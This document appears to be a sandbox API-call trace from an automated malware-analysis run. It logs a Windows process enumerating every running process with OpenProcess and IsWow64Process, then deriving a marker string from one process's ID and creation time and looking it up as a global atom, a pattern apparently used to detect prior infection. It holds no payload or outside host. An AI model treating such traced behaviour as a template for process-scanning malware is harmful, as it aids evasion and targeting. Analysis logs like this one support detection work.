	[0116.165] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.165] CloseHandle (hObject=0x698) returned 1
	[0116.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.166] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.166] CloseHandle (hObject=0x698) returned 1
	[0116.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.166] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.166] CloseHandle (hObject=0x698) returned 1
	[0116.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.166] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.166] CloseHandle (hObject=0x698) returned 1
	[0116.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.166] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.166] CloseHandle (hObject=0x698) returned 1
	[0116.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.166] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.167] CloseHandle (hObject=0x698) returned 1
	[0116.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.167] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.167] CloseHandle (hObject=0x698) returned 1
	[0116.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.167] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.167] CloseHandle (hObject=0x698) returned 1
	[0116.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.167] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.167] CloseHandle (hObject=0x698) returned 1
	[0116.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.167] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.168] CloseHandle (hObject=0x698) returned 1
	[0116.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.168] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.168] CloseHandle (hObject=0x698) returned 1
	[0116.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.168] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.168] CloseHandle (hObject=0x698) returned 1
	[0116.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.168] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.168] CloseHandle (hObject=0x698) returned 1
	[0116.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.168] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.168] CloseHandle (hObject=0x698) returned 1
	[0116.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.169] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.169] CloseHandle (hObject=0x698) returned 1
	[0116.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.169] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.169] CloseHandle (hObject=0x698) returned 1
	[0116.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.169] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.169] CloseHandle (hObject=0x698) returned 1
	[0116.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.169] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.169] CloseHandle (hObject=0x698) returned 1
	[0116.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.170] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.170] CloseHandle (hObject=0x698) returned 1
	[0116.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.170] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.170] CloseHandle (hObject=0x698) returned 1
	[0116.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.170] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.170] CloseHandle (hObject=0x698) returned 1
	[0116.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.170] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.170] CloseHandle (hObject=0x698) returned 1
	[0116.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.171] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.172] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.172] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.172] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.172] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.172] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.172] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.173] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.173] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.173] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.173] CloseHandle (hObject=0x698) returned 1
	[0116.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.173] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.173] CloseHandle (hObject=0x698) returned 1
	[0116.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.173] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.173] CloseHandle (hObject=0x698) returned 1
	[0116.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.174] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.174] CloseHandle (hObject=0x698) returned 1
	[0116.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.369] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.369] CloseHandle (hObject=0x698) returned 1
	[0116.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.369] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.369] CloseHandle (hObject=0x698) returned 1
	[0116.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.370] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.370] CloseHandle (hObject=0x698) returned 1
	[0116.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.370] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.370] CloseHandle (hObject=0x698) returned 1
	[0116.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.370] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.370] CloseHandle (hObject=0x698) returned 1
	[0116.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.371] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.371] CloseHandle (hObject=0x698) returned 1
	[0116.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.371] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.371] CloseHandle (hObject=0x698) returned 1
	[0116.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.371] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.371] CloseHandle (hObject=0x698) returned 1
	[0116.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.371] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.371] CloseHandle (hObject=0x698) returned 1
	[0116.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.372] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.372] CloseHandle (hObject=0x698) returned 1
	[0116.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.372] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.372] CloseHandle (hObject=0x698) returned 1
	[0116.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.372] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.372] CloseHandle (hObject=0x698) returned 1
	[0116.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.372] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.372] CloseHandle (hObject=0x698) returned 1
	[0116.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.373] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.373] CloseHandle (hObject=0x698) returned 1
	[0116.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.373] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.373] CloseHandle (hObject=0x698) returned 1
	[0116.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.373] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.373] CloseHandle (hObject=0x698) returned 1
	[0116.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.373] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.373] CloseHandle (hObject=0x698) returned 1
	[0116.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.374] CloseHandle (hObject=0x698) returned 1
	[0116.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.374] CloseHandle (hObject=0x698) returned 1
	[0116.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.374] CloseHandle (hObject=0x698) returned 1
	[0116.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.375] CloseHandle (hObject=0x698) returned 1
	[0116.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.375] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.375] CloseHandle (hObject=0x698) returned 1
	[0116.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.375] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.375] CloseHandle (hObject=0x698) returned 1
	[0116.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.375] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.375] CloseHandle (hObject=0x698) returned 1
	[0116.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.376] CloseHandle (hObject=0x698) returned 1
	[0116.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.376] CloseHandle (hObject=0x698) returned 1
	[0116.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.376] CloseHandle (hObject=0x698) returned 1
	[0116.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.376] CloseHandle (hObject=0x698) returned 1
	[0116.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.377] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.377] CloseHandle (hObject=0x698) returned 1
	[0116.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.377] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.377] CloseHandle (hObject=0x698) returned 1
	[0116.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.377] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.377] CloseHandle (hObject=0x698) returned 1
	[0116.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.378] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.378] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.378] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.378] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.378] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.379] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.379] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.383] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.383] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.383] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.383] CloseHandle (hObject=0x698) returned 1
	[0116.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.383] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.383] CloseHandle (hObject=0x698) returned 1
	[0116.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.384] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.384] CloseHandle (hObject=0x698) returned 1
	[0116.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.384] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.384] CloseHandle (hObject=0x698) returned 1
	[0116.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.422] CloseHandle (hObject=0x698) returned 1
	[0116.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.422] CloseHandle (hObject=0x698) returned 1
	[0116.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.423] CloseHandle (hObject=0x698) returned 1
	[0116.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.423] CloseHandle (hObject=0x698) returned 1
	[0116.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.423] CloseHandle (hObject=0x698) returned 1
	[0116.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.423] CloseHandle (hObject=0x698) returned 1
	[0116.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.424] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.424] CloseHandle (hObject=0x698) returned 1
	[0116.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.424] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.424] CloseHandle (hObject=0x698) returned 1
	[0116.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.424] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.424] CloseHandle (hObject=0x698) returned 1
	[0116.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.425] CloseHandle (hObject=0x698) returned 1
	[0116.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.425] CloseHandle (hObject=0x698) returned 1
	[0116.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.425] CloseHandle (hObject=0x698) returned 1
	[0116.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.425] CloseHandle (hObject=0x698) returned 1
	[0116.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.425] CloseHandle (hObject=0x698) returned 1
	[0116.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.426] CloseHandle (hObject=0x698) returned 1
	[0116.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.426] CloseHandle (hObject=0x698) returned 1
	[0116.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
